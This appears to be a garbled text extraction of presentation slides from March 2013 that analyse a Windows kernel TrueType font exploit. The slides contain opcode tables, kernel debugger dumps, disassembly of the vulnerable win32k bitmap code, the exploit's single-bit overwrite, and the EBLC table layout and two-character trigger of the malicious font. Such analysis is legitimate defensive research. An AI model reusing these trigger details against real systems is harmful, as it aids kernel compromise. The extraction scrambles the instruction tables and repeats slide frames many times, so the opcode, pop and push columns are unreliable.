argn, cn, argn-1,cn-1, , arg1, c1 argn, cn, argn-1,cn-1, , arg1, c1 argn, cn, argn-1,cn-1, , arg1, c1 argn, pn, argn-1, pn-1, , arg1, p1 argn, pn, argn-1, pn-1, , arg1, p1 argn, pn, argn-1, pn-1, , arg1, p1 n
n2, n1
(n1 * 64)/ n2
MSIRP[a]
0x3A -taking
0x3B d,
p from the interpreter stackTable
2 Instructions
data
MUL[ ]
0x63
n2, n1
NEG[ ]
0x65
n
Instruction
Opcode
Pops
NEQ[] ]
0x55
e2,
AA[
0x7F
p e1
NOT[] ]
0x5C
e
ABS[
0x64
n
NROUND[ab]
0x6C - 0x6F n1
ADD[
]
0x60
n2, n1
ODD[ ]
0x56
e
ALIGNPTS[
]
0x27
p2, p1
OR[ ]
0x5B
e2,
ALIGNRP[
]
0x3C
p1, e1
p2, ... , ploopvalue
POP[ ]]
0x21
e
AND[
0x5A
e2, e1
RCVT[ ]]
0x45
location
CALL[
0x2B
f
RDTG[ ] ]
0x7D
CEILING[
0x67
n
ROFF[ ] ]
0x7A
CINDEX[
0x25
k
2 of 4
1 of 4
Friday, March 8, 2013
CLEAR[ ]
DEBUG[ ]
DELTAC1[ ],
DELTAC2[ ]
DELTAC3[ ]
DELTAP1[ ]
DELTAP2[ ]
DELTAP3[ ]
DEPTH[ ]
DIV[ ]
0x22
0x4F
0x73
0x74
0x75
0x5D
0x71
0x72
0x24
0x62
(n1 * n2)/64
-n
Pushes
b(|n|
not e )
n2
(n1 + n2)
bb-b
value
-Èn
-ek
all items on the stack
n
argn, cn, argn-1,cn-1, , arg1, c1 argn, cn, argn-1,cn-1, , arg1, c1 argn, cn, argn-1,cn-1, , arg1, c1 argn, pn, argn-1, pn-1, , arg1, p1 argn, pn, argn-1, pn-1, , arg1, p1 argn, pn, argn-1, pn-1, , arg1, p1 n
n2, n1
(n1 * 64)/ n2
2 of 4
1 of 4
Friday, March 8, 2013
MIRP[abcde]
0xE0 - 0xFF n, p
Table
2 ]Instructions
MPPEM[
0x4B taking-data from the interpreter stack
ppem
MPS[ ]
0x4C
pointSize
Instruction
Opcode
Pops
MSIRP[a]
0x3A - 0x3B d,
p
- Pushes
MUL[
0x63
n2,
(n1
AA[
] ]
0x7F
p n1
- * n2)/64
NEG[] ]
0x65
nn
-n|n|
ABS[
0x64
NEQ[ ]
0x55
e2,
b (n1 + n2)
ADD[
0x60
n2,e1
n1
NOT[ ]
0x5C
ep2, p1
( not
ALIGNPTS[
]
0x27
- e)
NROUND[ab]
0x6C - 0x6F n1
n2
ALIGNRP[
]
0x3C
p1, p2, ... , ploopvalue
ODD[ ]]
0x56
ee2, e1
bb
AND[
0x5A
OR[ ] ]
0x5B
e2,
bCALL[
0x2B
f e1
POP[ ] ]
0x21
en
- Èn
CEILING[
0x67
RCVT[ ] ]
0x45
location
value
CINDEX[
0x25
k
ek
RDTG[ ]]
0x7D
-all items on the stack
-CLEAR[
0x22
ROFF[ ] ]
0x7A
-n
-DEBUG[
0x4F
DELTAC1[ ],
0x73
argn, cn, argn-1,cn-1, , arg1, c1 DELTAC2[ ]
0x74
argn, cn, argn-1,cn-1, , arg1, c1 DELTAC3[ ]
0x75
argn, cn, argn-1,cn-1, , arg1, c1 DELTAP1[ ]
0x5D
argn, pn, argn-1, pn-1, , arg1, p1 DELTAP2[ ]
0x71
argn, pn, argn-1, pn-1, , arg1, p1 DELTAP3[ ]
0x72
argn, pn, argn-1, pn-1, , arg1, p1 DEPTH[ ]
0x24
n
DIV[ ]
0x62
n2, n1
(n1 * 64)/ n2
MPS[ ] 2 Instructions
0x4C taking data
Table
from the interpreter stack pointSize
MSIRP[a]
0x3A - 0x3B d, p
MUL[ ]
0x63
n2, n1
(n1 * n2)/64
Instruction
Opcode
Pops
Pushes
NEG[
0x65
AA[
] ]
0x7F
pn
- -n
NEQ[] ]
0x55
ABS[
0x64
ne2, e1
|n|b
NOT[ ]]
0x5C
e n1
e)
ADD[
0x60
n2,
(n1( not
+ n2)
NROUND[ab]
0x6C - 0x6Fp2,
n1p1
ALIGNPTS[
]
0x27
- n2
ODD[ ] ]
0x56
e p2, ... , ploopvalue
ALIGNRP[
0x3C
p1,
- b
OR[ ] ]
0x5B
e2,e1e1
AND[
0x5A
e2,
b b
POP[ ]]
0x21
CALL[
0x2B
fe
- RCVT[ ] ]
0x45
CEILING[
0x67
nlocation
Ènvalue
RDTG[ ] ]
0x7D
CINDEX[
0x25
kekCLEAR[
0x22
all- items on the stack
- ROFF[ ]]
0x7A
2 of 4
1 of 4
Friday, March 8, 2013
DEBUG[ ]
DELTAC1[ ],
DELTAC2[ ]
DELTAC3[ ]
DELTAP1[ ]
DELTAP2[ ]
DELTAP3[ ]
DEPTH[ ]
DIV[ ]
0x4F
0x73
0x74
0x75
0x5D
0x71
0x72
0x24
0x62
n
argn, cn, argn-1,cn-1, , arg1, c1 argn, cn, argn-1,cn-1, , arg1, c1 argn, cn, argn-1,cn-1, , arg1, c1 argn, pn, argn-1, pn-1, , arg1, p1 argn, pn, argn-1, pn-1, , arg1, p1 argn, pn, argn-1, pn-1, , arg1, p1 n
n2, n1
(n1 * 64)/ n2
MINDEX[ ]
0x26
k
ek
Table
2 Instructions
data
MIRP[abcde]
0xE0 -taking
0xFF n,
p from the interpreter stackMPPEM[ ]
0x4B
ppem
Instruction
Opcode
Pops
Pushes
MPS[ ]
0x4C
pointSize
AA[
]
0x7F
MSIRP[a]
0x3A - 0x3B pd, p
-ABS[
] ]
0x64
nn2, n1
|n|* n2)/64
MUL[
0x63
(n1
ADD[
0x60
n2,
(n1 + n2)
NEG[] ]
0x65
n n1
-n
ALIGNPTS[
]
0x27
p2,
NEQ[ ]
0x55
e2, p1
e1
bNOT[ ] ]
0x5C
e p2, ... , ploopvalue
( -not e )
ALIGNRP[
0x3C
p1,
NROUND[ab]
0x6C - 0x6F e2,
n1 e1
n2
AND[
]
0x5A
b
ODD[] ]
0x56
bCALL[
0x2B
fe
OR[ ]
0x5B
bÈn
CEILING[
]
0x67
ne2, e1
POP[ ] ]
0x21
-ek
CINDEX[
0x25
ke
RCVT[ ]]
0x45
location
value
CLEAR[
0x22
all
items on the stack
RDTG[ ]]
0x7D
-DEBUG[
0x4F
nROFF[ ] ],
0x7A
DELTAC1[
0x73
argn,
cn, argn-1,cn-1, , arg1, c1 --
DELTAC2[ ]
DELTAC3[ ]
2 of 4 DELTAP1[ ]
DELTAP2[ ]
DELTAP3[ ]
DEPTH[ ]
DIV[ ]
1 of 4
Friday, March 8, 2013
0x74
0x75
0x5D
0x71
0x72
0x24
0x62
argn, cn, argn-1,cn-1, , arg1, c1 argn, cn, argn-1,cn-1, , arg1, c1 argn, pn, argn-1, pn-1, , arg1, p1 argn, pn, argn-1, pn-1, , arg1, p1 argn, pn, argn-1, pn-1, , arg1, p1 n
n2, n1
(n1 * 64)/ n2
Instruction Opcode
ADD[ ] 0x60
SUB[ ] 0x61
DIV[ ] 0x62
MUL[ ] 0x63
ABS[ ] 0x64
NEG[ ] 0x65
FLOOR[ ] 0x66
etc.
Friday, March 8, 2013
Instruction Opcode
ADD[ ] 0x60
SUB[ ] 0x61
DIV[ ] 0x62
MUL[ ] 0x63
ABS[ ] 0x64
NEG[ ] 0x65
FLOOR[ ] 0x66
etc.
Friday, March 8, 2013
All these functions
start out like this
Friday, March 8, 2013
And by ‘all’ I mean
190 of them.
Friday, March 8, 2013
Must be a pointer to
some kind of global
TrueType VM state.
Friday, March 8, 2013
And this must be some
kind of error code.
Friday, March 8, 2013
Especially since it’s
always used like this
Friday, March 8, 2013
Ditto on this one
(201 references)
Friday, March 8, 2013
This VM global only
seems to be involved
with CALL and LOOPCALL
Friday, March 8, 2013
This VM global only
seems to be involved
with Relative Jumps
Friday, March 8, 2013
This VM global only
seems to be involved
with Conditionals
Friday, March 8, 2013
There is a debugging symbol for this
one. I’m guessing “Graphics State”.
Friday, March 8, 2013
There’s no corresponding “GlobalGS” symbol,
except for in this function’s name.
Friday, March 8, 2013
Getting on with it...
Friday, March 8, 2013
So, this is the last spot
that EBP points to when
the shellcode runs
Friday, March 8, 2013
Somewhere in
itrp_Execute() is
a CALL or JMP to
the shellcode...
Friday, March 8, 2013
This is the main
loop of the opcode
interpreter
Friday, March 8, 2013
This is the opcode
function jump table
Friday, March 8, 2013
Many Hours Later...
Friday, March 8, 2013
WCVTP[] Write Control Value Table in Pixel units
Code Range
Pops
0x44
v: value in pixels (F26Dot6)
l: control value table location (uint32)
Pushes
Sets
control value table entry
Related instructions
WCVTF[ ]
Writes the value in pixels into the control value table location specified.
Pops a value v and a control value table location l from the stack and puts that
value in the specified location in the control value table. This instruction assumes
the value taken from the stack is in pixels and not in FUnits. The value is written to
the CVT table unchanged. The location l must be less than the number of storage
locations specified in the 'maxp' table in the font file.
Friday, March 8, 2013
WCVTP[] Write Control Value Table in Pixel units
(32 bits)
Code Range
Pops
0x44
v: value in pixels (F26Dot6)
l: control value table location (uint32)
Pushes
Sets
control value table entry
Related instructions
WCVTF[ ]
Writes the value in pixels into the control value table location specified.
Pops a value v and a control value table location l from the stack and puts that
value in the specified location in the control value table. This instruction assumes
the value taken from the stack is in pixels and not in FUnits. The value is written to
the CVT table unchanged. The location l must be less than the number of storage
locations specified in the 'maxp' table in the font file.
Friday, March 8, 2013
WCVTP[] Write Control Value Table in Pixel units
Code Range
Pops
0x44
v: value in pixels (F26Dot6)
l: control value table location (uint32)
Pushes
Sets
control value table entry
Related instructions
WCVTF[ ]
Writes the value in pixels into the control value table location specified.
Pops a value v and a control value table location l from the stack and puts that
value in the specified location in the control value table. This instruction assumes
the value taken from the stack is in pixels and not in FUnits. The value is written to
the CVT table unchanged. The location l must be less than the number of storage
locations specified in the 'maxp' table in the font file.
Friday, March 8, 2013
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff
call
e2482368
kd> dd /c8 e2481f84
e2481f84 e2481afc e2481f00
e2481fa4 00000000 00000044
e2481fc4 00000003 00000000
e2481fe4 00000000 00000000
e2482004 00000000 00000000
e2482024 00000000 bf85bd4b
e2482044 00000000 00000000
e2481f80
00000000
00000000
00000000
00030009
bf85bd4b
00000000
00030004
00000000
00000000
00000000
00010080
e2482368
00000000
kd> d e2481f84+134
e24820b8 00000081
e24820c8 00040000
e24820d8 00000064
e24820e8 00000006
00040000
00000001
e1c5d4b0
00000000
00040000
00002710
e2481efc
00000000
Friday, March 8, 2013
00040000
00000000
00989680
00000000
Pointer to Global
Graphics State
00040000 00000000 00000000
(Likely
called
00000000
00000000
00000040
00030009
00000080 00000001
“GlobalGS”)
00000040
00000001
e24bdbb3
00000000
bf85c269
e2481f80
0000000d
00000000
00000003
e2481f80
e2482318
00000000
00000
bf85c
00000
00000
00000
0003b
00000
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff
call
e2482368
kd> dd /c8 e2481f84
e2481f84 e2481afc e2481f00
e2481fa4 00000000 00000044
e2481fc4 00000003 00000000
e2481fe4 00000000 00000000
e2482004 00000000 00000000
e2482024 00000000 bf85bd4b
e2482044 00000000 00000000
e2481f80
00000000
00000000
00000000
00030009
bf85bd4b
00000000
00030004
00000000
00000000
00000000
00010080
e2482368
00000000
kd> d e2481f84+134
e24820b8 00000081
e24820c8 00040000
e24820d8 00000064
e24820e8 00000006
00040000
00000001
e1c5d4b0
00000000
00040000
00002710
e2481efc
00000000
Friday, March 8, 2013
00040000
00000000
00989680
00000000
Pointer to TT
Interpreter
Stack
00040000
00000000 00000000
00000000
00000000 00000040
Base
00030009 00000080 00000001
00000040
00000001
e24bdbb3
00000000
bf85c269
e2481f80
0000000d
00000000
00000003
e2481f80
e2482318
00000000
00000
bf85c
00000
00000
00000
0003b
00000
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff
call
e2482368
kd> dd /c8 e2481f84
e2481f84 e2481afc e2481f00
e2481fa4 00000000 00000044
e2481fc4 00000003 00000000
e2481fe4 00000000 00000000
e2482004 00000000 00000000
e2482024 00000000 bf85bd4b
e2482044 00000000 00000000
e2481f80
00000000
00000000
00000000
00030009
bf85bd4b
00000000
00030004
00000000
00000000
00000000
00010080
e2482368
00000000
kd> d e2481f84+134
e24820b8 00000081
e24820c8 00040000
e24820d8 00000064
e24820e8 00000006
00040000
00000001
e1c5d4b0
00000000
00040000
00002710
e2481efc
00000000
Friday, March 8, 2013
00040000
00000000
00989680
00000000
Pointer to “Storage
00040000 00000000 00000000 00000
Area”
00000000
00000000 00000040 bf85c
00030009
00000040
00000001
e24bdbb3
00000000
00000080
bf85c269
e2481f80
0000000d
00000000
00000001
00000003
e2481f80
e2482318
00000000
00000
00000
00000
0003b
00000
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff
call
e2482368
kd> dd /c8 e2481f84
e2481f84 e2481afc e2481f00
e2481fa4 00000000 00000044
e2481fc4 00000003 00000000
e2481fe4 00000000 00000000
e2482004 00000000 00000000
e2482024 00000000 bf85bd4b
e2482044 00000000 00000000
e2481f80
00000000
00000000
00000000
00030009
bf85bd4b
00000000
00030004
00000000
00000000
00000000
00010080
e2482368
00000000
kd> d e2481f84+134
e24820b8 00000081
e24820c8 00040000
e24820d8 00000064
e24820e8 00000006
00040000
00000001
e1c5d4b0
00000000
00040000
00002710
e2481efc
00000000
Friday, March 8, 2013
00040000
00000000
00989680
00000000
Pointer to “Control
00040000 00000000 00000000 00000
Value
Table”
00000000
00000000
00000040 bf85c
00030009
00000040
00000001
e24bdbb3
00000000
00000080
bf85c269
e2481f80
0000000d
00000000
00000001
00000003
e2481f80
e2482318
00000000
00000
00000
00000
0003b
00000
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff
call
e2482368
kd> dd /c8 e2481f84
e2481f84 e2481afc e2481f00
e2481fa4 00000000 00000044
e2481fc4 00000003 00000000
e2481fe4 00000000 00000000
e2482004 00000000 00000000
e2482024 00000000 bf85bd4b
e2482044 00000000 00000000
e2481f80
00000000
00000000
00000000
00030009
bf85bd4b
00000000
00030004
00000000
00000000
00000000
00010080
e2482368
00000000
kd> d e2481f84+134
e24820b8 00000081
e24820c8 00040000
e24820d8 00000064
e24820e8 00000006
00040000
00000001
e1c5d4b0
00000000
00040000
00002710
e2481efc
00000000
Friday, March 8, 2013
00040000
00000000
00989680
00000000
Pixels
per em
00000000
00000000
00040000
00000000
00030009
00000040
00000001
e24bdbb3
00000000
00000000
00000080
bf85c269
e2481f80
0000000d
00000000
00000040
00000001
00000003
e2481f80
e2482318
00000000
00000
bf85c
00000
00000
00000
0003b
00000
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff
call
e2482368
kd> dd /c8 e2481f84
e2481f84 e2481afc e2481f00
e2481fa4 00000000 00000044
e2481fc4 00000003 00000000
e2481fe4 00000000 00000000
e2482004 00000000 00000000
e2482024 00000000 bf85bd4b
e2482044 00000000 00000000
e2481f80
00000000
00000000
00000000
00030009
bf85bd4b
00000000
00030004
00000000
00000000
00000000
00010080
e2482368
00000000
kd> d e2481f84+134
e24820b8 00000081
e24820c8 00040000
e24820d8 00000064
e24820e8 00000006
00040000
00000001
e1c5d4b0
00000000
00040000
00002710
e2481efc
00000000
Friday, March 8, 2013
00040000
00000000
00989680
00000000
Point
Size
00000000
00040000
00000000
00030009
00000040
00000001
e24bdbb3
00000000
00000000
00000080
bf85c269
e2481f80
0000000d
00000000
00000000
00000040
00000001
00000003
e2481f80
e2482318
00000000
00000
bf85c
00000
00000
00000
0003b
00000
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff
call
e2482368
kd> dd /c8 e2481f84
e2481f84 e2481afc e2481f00
e2481fa4 00000000 00000044
e2481fc4 00000003 00000000
e2481fe4 00000000 00000000
e2482004 00000000 00000000
e2482024 00000000 bf85bd4b
e2482044 00000000 00000000
kd> d e2481f84+134
e24820b8 00000081
e24820c8 00040000
e24820d8 00000064
e24820e8 00000006
Friday, March 8, 2013
e2481f80
00000000
00000000
00000000
00030009
bf85bd4b
00000000
00030004
00000000
00000000
00000000
00010080
e2482368
00000000
CVT Count
00040000
00000000
00989680
00000000
00040000
00000001
e1c5d4b0
00000000
00040000
00002710
e2481efc
00000000
00040000
00000000
00030009
00000040
00000001
e24bdbb3
00000000
00000000
00000000
00000080
bf85c269
e2481f80
0000000d
00000000
00000000
00000040
00000001
00000003
e2481f80
e2482318
00000000
00000
bf85c
00000
00000
00000
0003b
00000
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff
call
e2482368
kd> dd /c8 e2481f84
e2481f84 e2481afc e2481f00
e2481fa4 00000000 00000044
e2481fc4 00000003 00000000
e2481fe4 00000000 00000000
e2482004 00000000 00000000
e2482024 00000000 bf85bd4b
e2482044 00000000 00000000
e2481f80
00000000
00000000
00000000
00030009
bf85bd4b
00000000
00030004
00000000
00000000
00000000
00010080
e2482368
00000000
kd> d e2481f84+134
e24820b8 00000081
e24820c8 00040000
e24820d8 00000064
e24820e8 00000006
00040000
00000001
e1c5d4b0
00000000
00040000
00002710
e2481efc
00000000
X and Y scalars for
“instructable” and
“metric” things
00040000
00000000
00989680
00000000
End of Global
Structure (I think)
Friday, March 8, 2013
00040000
00000000
00030009
00000040
00000001
e24bdbb3
00000000
00000000
00000000
00000080
bf85c269
e2481f80
0000000d
00000000
00000000
00000040
00000001
00000003
e2481f80
e2482318
00000000
00000
bf85c
00000
00000
00000
0003b
00000
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff
call
e2482368
kd> dd /c8 e2481f84
e2481f84 e2481afc e2481f00
e2481fa4 00000000 00000044
e2481fc4 00000003 00000000
e2481fe4 00000000 00000000
e2482004 00000000 00000000
e2482024 00000000 bf85bd4b
e2482044 00000000 00000000
e2481f80
00000000
00000000
00000000
00030009
bf85bd4b
00000000
00030004
00000000
00000000
00000000
00010080
e2482368
00000000
But this is the
important part!
00040000 00040000 00040000
kd> d e2481f84+134
e24820b8 00000081
e24820c8 00040000 00000000 00000001 00002710
e24820d8 00000064 00989680 e1c5d4b0 e2481efc
e24820e8 00000006 00000000 00000000 00000000
Friday, March 8, 2013
00040000
00000000
00030009
00000040
00000001
e24bdbb3
00000000
00000000
00000000
00000080
bf85c269
e2481f80
0000000d
00000000
00000000
00000040
00000001
00000003
e2481f80
e2482318
00000000
00000
bf85c
00000
00000
00000
0003b
00000
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff
call
e2482368
kd> dd /c8 e2481f84
e2481f84 e2481afc e2481f00
e2481fa4 00000000 00000044
e2481fc4 00000003 00000000
e2481fe4 00000000 00000000
e2482004 00000000 00000000
e2482024 00000000 bf85bd4b
e2482044 00000000 00000000
e2481f80
00000000
00000000
00000000
00030009
bf85bd4b
00000000
00030004
00000000
00000000
00000000
00010080
e2482368
00000000
But this is the
important part!
00040000 00040000 00040000
kd> d e2481f84+134
e24820b8 00000081
e24820c8 00040000 00000000 00000001 00002710
e24820d8 00000064 00989680 e1c5d4b0 e2481efc
e24820e8 00000006 00000000 00000000 00000000
Because this is the
location of the
single bit overwrite
by the exploit
Friday, March 8, 2013
00040000
00000000
00030009
00000040
00000001
e24bdbb3
00000000
00000000
00000000
00000080
bf85c269
e2481f80
0000000d
00000000
00000000
00000040
00000001
00000003
e2481f80
e2482318
00000000
00000
bf85c
00000
00000
00000
0003b
00000
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff
call
e2482368
kd> dd /c8 e2481f84
e2481f84 e2481afc e2481f00
e2481fa4 00000000 00000044
e2481fc4 00000003 00000000
e2481fe4 00000000 00000000
e2482004 00000000 00000000
e2482024 00000000 bf85bd4b
e2482044 00000000 00000000
e2481f80
00000000
00000000
00000000
00030009
bf85bd4b
00000000
00030004
00000000
00000000
00000000
00010080
e2482368
00000000
00040000
00000000
00030009
00000040
00000001
e24bdbb3
00000000
00000000
00000000
00000080
bf85c269
e2481f80
0000000d
00000000
00000000
00000040
00000001
00000003
e2481f80
e2482318
00000000
00000
bf85c
00000
00000
00000
0003b
00000
But this is the
important part!
00040000 00040000 00040000
kd> d e2481f84+134
e24820b8 00000081
e24820c8 00040000 00000000 00000001 00002710
e24820d8 00000064 00989680 e1c5d4b0 e2481efc
e24820e8 00000006 00000000 00000000 00000000
Because this is the
location of the
single bit overwrite
by the exploit
Friday, March 8, 2013
It was originally 0x01,
but now it’s 0x81
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff
call
e2482368
kd> dd /c8 e2481f84
e2481f84 e2481afc e2481f00
e2481fa4 00000000 00000044
e2481fc4 00000003 00000000
e2481fe4 00000000 00000000
e2482004 00000000 00000000
e2482024 00000000 bf85bd4b
e2482044 00000000 00000000
e2481f80
00000000
00000000
00000000
00030009
bf85bd4b
00000000
00030004
00000000
00000000
00000000
00010080
e2482368
00000000
kd> d e2481f84+134
e24820b8 00000081
e24820c8 00040000
e24820d8 00000064
e24820e8 00000006
00040000
00000001
e1c5d4b0
00000000
00040000
00002710
e2481efc
00000000
Friday, March 8, 2013
00040000
00000000
00989680
00000000
00040000
00000000
00030009
00000040
00000001
e24bdbb3
00000000
00000000
00000000
00000080
bf85c269
e2481f80
0000000d
00000000
Normally the CVT
is pointed to here.
00000000
00000040
00000001
00000003
e2481f80
e2482318
00000000
00000
bf85c
00000
00000
00000
0003b
00000
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff
call
e2482368
e2481f80
e2481f84
e2481fa4
e2481fc4
e2481fe4
e2482004
e2482024
e2482044
It’s just before the Global
State stuff in memory
00000000
e2481afc
00000000
00000003
00000000
00000000
00000000
00000000
e2481f00
00000044
00000000
00000000
00000000
bf85bd4b
00000000
e2481f80
00000000
00000000
00000000
00030009
bf85bd4b
00000000
00030004
00000000
00000000
00000000
00010080
e2482368
00000000
kd> d e2481f84+134
e24820b8 00000081
e24820c8 00040000
e24820d8 00000064
e24820e8 00000006
00040000
00000000
00989680
00000000
00040000
00000001
e1c5d4b0
00000000
00040000
00002710
e2481efc
00000000
Friday, March 8, 2013
00040000
00000000
00030009
00000040
00000001
e24bdbb3
00000000
00000000
00000000
00000080
bf85c269
e2481f80
0000000d
00000000
Normally the CVT
is pointed to here.
00000000
00000040
00000001
00000003
e2481f80
e2482318
00000000
00000
bf85c
00000
00000
00000
0003b
00000
Vulnerable Code
win32k!sfac_GetSbitBitmap+0x56:
953cdc49 8b553c
953cdc4c 33c9
953cdc4e 53
953cdc4f 8bd8
953cdc51
953cdc55
953cdc58
953cdc5c
953cdc5f
953cdc62
953cdc65
Friday, March 8, 2013
0fb74530
66890a
0fb74d2c
8b5534
0fafc8
8b4528
034d38
mov
xor
push
mov
edx,dword ptr [ebp+3Ch]
ecx,ecx
ebx
ebx,eax ; ?
movzx
mov
movzx
mov
imul
mov
add
eax,word ptr [ebp+30h] ss:0010:95f3f2d0 = 0020 ; usDstRowBytes
word ptr [edx],cx
; [ebp+3Ch] = 0
ecx,word ptr [ebp+2Ch] ss:0010:95f3f2cc = 0052 ; usYOffset
edx,dword ptr [ebp+34h] ss:0010:95f3f2d4 = 0001 ; usBitDepth
ecx,eax
; ecx=00000a40
eax,dword ptr [ebp+28h]
; usShaveTop
ecx,dword ptr [ebp+38h]
; ecx=fe2740c4
;
pusCompCount + 0xb1 + 0xa40
; == 0
EBLC tables and stuff
• So, the “Dexter” font has only six
characters defined in it, and four of them
are zero by zero glyphs of zero length
• The other two trigger the vulnerability, you
need two, because it’s in the code that
adjusts the distance between the two
• So, the two characters are, and must appear
in this order:
:)
Friday, March 8, 2013
'EBLC' Table - Embedded Bitmap Location Table
--------------------------------------------Version: 2.0
Number of Sizes: 6
Strike 1
=========
Index Array Offset:
Size of Index Tables:
Number of Index Tables:
Color Reference Offset:
Horizontal Line Metrics
Ascender:
Descender:
Max Width:
Caret Numer:
Caret Denom:
Caret Offset:
Min Orig SB:
Min Adv SB:
Max Befor BL:
Max After BL:
Vertical Line Metrics
Ascender:
Descender:
Max Width:
Caret Numer:
Caret Denom:
Caret Offset:
Min Orig SB:
Min Adv SB:
Max Befor BL:
Max After BL:
End of Line Metrics
Start Glyph Index:
End Glyph Index:
ppem X:
ppem Y:
Bit Depth:
Flags:
Friday, March 8, 2013
0x00000128
0x00000028
2
0x00000000
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
3
4
4
4
8
0x01
EBLC
Index Sub Table 1
-----------------First Glyph Index:
Last Glyph Index:
Index Format:
Image Format:
Image Data Offset Base:
Glyph:
3
Offset:
Last Offset:
3
3
3
1
0x00000004
0x00000004
0x0000000a
Index Sub Table 2
-----------------First Glyph Index:
Last Glyph Index:
Index Format:
Image Format:
Image Data Offset Base:
Glyph:
4
Offset:
Last Offset:
4
4
3
8
0x0000000a
0x0000000a
0x00000016
Strike 2
=========
Index Array Offset:
Size of Index Tables:
Number of Index Tables:
Color Reference Offset:
Horizontal Line Metrics
Ascender:
Descender:
Max Width:
Caret Numer:
Caret Denom:
Caret Offset:
Min Orig SB:
Min Adv SB:
Max Befor BL:
Max After BL:
Vertical Line Metrics
Ascender:
Descender:
Max Width:
Caret Numer:
Caret Denom:
Caret Offset:
Min Orig SB:
So, if you could read
this, you’d see that the
first five characters
point to the same place
0x00000128
0x00000028
2
0x00000000
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
Strike 6
=========
Index Array Offset:
Size of Index Tables:
Number of Index Tables:
Color Reference Offset:
Horizontal Line Metrics
Ascender:
Descender:
Max Width:
Caret Numer:
Caret Denom:
Caret Offset:
Min Orig SB:
Min Adv SB:
Max Befor BL:
Max After BL:
Vertical Line Metrics
Ascender:
Descender:
Max Width:
Caret Numer:
Caret Denom:
Caret Offset:
Min Orig SB:
Min Adv SB:
Max Befor BL:
Max After BL:
End of Line Metrics
Start Glyph Index:
End Glyph Index:
ppem X:
ppem Y:
Bit Depth:
Flags:
Friday, March 8, 2013
0x00000150
0x00000028
2
0x00000000
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
3
4
1
1
1
0x01
EBLC
Index Sub Table 1
